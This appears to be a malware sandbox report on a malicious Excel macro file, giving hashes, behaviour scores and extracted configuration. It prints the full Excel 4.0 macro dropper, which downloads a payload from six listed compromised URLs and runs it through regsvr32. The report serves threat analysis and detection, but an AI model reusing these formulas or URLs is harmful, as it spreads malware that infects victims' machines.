Overview

overview

10

Static

static

10

8766fe2849...3.xlsm

windows7-x64

10

8766fe2849...3.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    8766fe28490a485703eabc3ebc5ce53de390293d9142f5542361be05f4f3c893

  • Size

    46KB

  • Sample

    241120-z4frlayjaj

  • MD5

    c9cf1eb1c2c69d78f299501be6ac6f9c

  • SHA1

    d03b4c850b819b11482b5d932c2ddfa500346d82

  • SHA256

    8766fe28490a485703eabc3ebc5ce53de390293d9142f5542361be05f4f3c893

  • SHA512

    1561e0f276a06b9c3019716ff407ac6254c484cc8d3a9fdf34d8277d94e6ccc0006f74ff31a087ab0ed5fb35852181f054ae2b3989b5c113081307b1e19d4fdc

  • SSDEEP

    768:GyMo9DOevZCwrvtE9WzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VP9HW:3Mo9D88tT5fTR4Lh1NisFYBc3cr+UqVk

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://aquapark.hotelrestoranaqua.com/wp-includes/a1eCjuFRWXku/

https://baksen.org/chat/8wYoYwWXH4eidiUOAs/

https://truetvkerala.com/wp-admin/iocOOm7I/

https://lavanya-aesthetic.com/cgi-bin/PjtfI2BlnvUtlMV2vTR/

http://kopkomerc.rs/wp-includes/css/ErPamucLecQSqd/

http://restoran.hotelrestoranaqua.com/wp-includes/67I/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aquapark.hotelrestoranaqua.com/wp-includes/a1eCjuFRWXku/","..\aew.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://baksen.org/chat/8wYoYwWXH4eidiUOAs/","..\aew.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://truetvkerala.com/wp-admin/iocOOm7I/","..\aew.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://lavanya-aesthetic.com/cgi-bin/PjtfI2BlnvUtlMV2vTR/","..\aew.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://kopkomerc.rs/wp-includes/css/ErPamucLecQSqd/","..\aew.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://restoran.hotelrestoranaqua.com/wp-includes/67I/","..\aew.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\aew.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://aquapark.hotelrestoranaqua.com/wp-includes/a1eCjuFRWXku/
xlm40.dropper

https://baksen.org/chat/8wYoYwWXH4eidiUOAs/

Targets

    • Target

      8766fe28490a485703eabc3ebc5ce53de390293d9142f5542361be05f4f3c893

    • Size

      46KB

    • MD5

      c9cf1eb1c2c69d78f299501be6ac6f9c

    • SHA1

      d03b4c850b819b11482b5d932c2ddfa500346d82

    • SHA256

      8766fe28490a485703eabc3ebc5ce53de390293d9142f5542361be05f4f3c893

    • SHA512

      1561e0f276a06b9c3019716ff407ac6254c484cc8d3a9fdf34d8277d94e6ccc0006f74ff31a087ab0ed5fb35852181f054ae2b3989b5c113081307b1e19d4fdc

    • SSDEEP

      768:GyMo9DOevZCwrvtE9WzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VP9HW:3Mo9D88tT5fTR4Lh1NisFYBc3cr+UqVk

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks